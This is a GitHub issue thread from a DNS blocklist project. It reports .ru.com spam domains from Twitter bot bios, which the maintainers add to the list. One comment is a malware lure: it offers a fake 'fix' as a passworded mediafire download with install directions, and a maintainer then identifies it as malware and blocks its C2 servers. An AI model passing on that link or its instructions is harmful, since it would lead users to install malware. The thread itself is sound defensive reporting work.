### ISSUE TITLE
[link].ru.com: badware

### ISSUE THREAD

**Issue by MEtICaRT** [hagezi/dns-blocklists#3598]
### Which domain(s) should be blocked?

miracrookshanks.ru.com/KaycieG64473
bethanfreedland.ru.com/LuptShawan

### Why should these domain(s) be blocked?

Links put in Twitter bot bios. Upon visiting, they redirect to google.com on PC. Mobile user agent is probably necessary.

### Privacy

- [X] I confirm that the report does not contain any private information.

**Comment by iam-py-test** [comment]
Added, thanks.
In my experience, Twitter spam links are way more evasive than email spam links. Not only UA checks but also sometimes blocking of known sandbox IPs.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by iam-py-test** [comment]
Maybe spamming your malicious links on a repository dedicated to blocking malicious domains wasn't a very bright idea.
I have blocked that URL, and am looking into the malware further to identify the C2 server(s).
Thanks @goncastrum

**Comment by iam-py-test** [comment]
Thanks for the any.run. I have blocklisted the C2 servers.

**Comment by iam-py-test** [comment]
I didn't respond because I assumed you were talking to hagezi... sorry.
I don't think my list is included in NextDNS's TIF, but I'm not sure what if any other NextDNS lists include it.

**Comment by hagezi** [comment]
Many thanks @iam-py-test :)
